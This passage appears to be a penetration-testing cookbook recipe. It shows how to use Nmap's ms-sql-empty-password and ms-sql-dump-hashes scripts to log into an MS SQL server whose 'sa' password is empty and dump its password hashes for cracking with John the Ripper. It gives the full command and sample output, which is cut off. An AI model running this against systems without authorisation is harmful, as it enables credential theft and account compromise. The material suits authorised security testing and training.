Dumping password hashes of MS SQL servers
After gaining access to a MS SQL server, we can dump all the password hashes of the server to compromise other accounts. Nmap can help us retrieve these hashes in a format usable by the cracking tool, John the Ripper.
This recipe shows how to dump password hashes of a MS SQL server with Nmap.
How to do it...
To dump all the password hashes of a MS SQL server with an empty system administrator password, run the following Nmap command:
$ nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>
The password hashes will be included in the ms-sql-dump-hashes
script output section:
PORT STATE SERVICE VERSION 1433/tcp open ms-sql-s Microsoft SQL Server 2011 Service Info: CPE: cpe:/o:microsoft:windows Host script results: | ms-sql-empty-password: | [192.168.1.102\MSSQLSERVER] |_ sa:<empty> => Login Success | ms-sql-dump-hashes: | [192.168.1.102\MSSQLSERVER] | sa...